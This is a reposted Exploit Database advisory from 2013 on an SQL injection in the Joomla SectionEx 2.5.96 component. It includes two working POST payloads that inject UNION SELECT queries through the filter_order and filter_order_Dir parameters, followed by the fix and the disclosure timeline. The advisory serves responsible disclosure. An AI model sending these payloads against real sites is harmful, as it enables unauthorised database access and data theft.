Joomla! Component com_sectionex 2.5.96 – SQL Injection

• Exploit Database
• 16 阅读

• 作者： Matias Fontanini
  日期： 2013-08-07
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/27405/

• -------------------------------------------------------------------------------------
  Joomla com_sectionex v2.5.96 SQL Injection vulnerabilities
  -------------------------------------------------------------------------------------
  
  == Description ==
  - Software link: http://stackideas.com/sectionex
  - Affected versions: version 2.5.96 is vulnerable. Other versions
  might be affected as well.
  - Author: Matias Fontanini
  
  == Vulnerabilities ==
  When using the "category" view, the component does not correctly
  sanitize the "filter_order" and "filter_order_Dir" parameters before
  using them to construct SQL queries, making it vulnerable to SQL
  Injection attacks.
  
  In order to exploit these vulnerabilities, an attacker could perform
  requests like the following ones:
  
  - For the "filter_order" parameter:
  
  POST /index.php?option=com_sectionex&view=category&id=X&Itemid=Y
  
  filter_title=&filter_content=&limit=0&sectionid=20&filter_order=1
  limit 1 offset 10000) union all (select
  1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16 from
  dual)%23&filter_order_Dir=DESC
  
  - For the "filter_order_Dir" parameter:
  
  POST /index.php?option=com_sectionex&view=category&id=X&Itemid=Y
  
  filter_title=&filter_content=&limit=0&sectionid=20&filter_order=1&filter_order_Dir=DESC
  limit 1 offset 10000) union all (select
  1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16 from dual)%23
  
  == Solution ==
  Upgrade the product to the 2.5.104 version.
  
  == Report timeline ==
  [2013-07-30] Vulnerabilities reported to the developers.
  [2013-07-30] Developers answered back indicating that a new release
  would be made soon.
  [2013-08-01] SectionEx 2.5.104 was released, which fixed the issues reported.
  [2013-08-05] Public disclosure.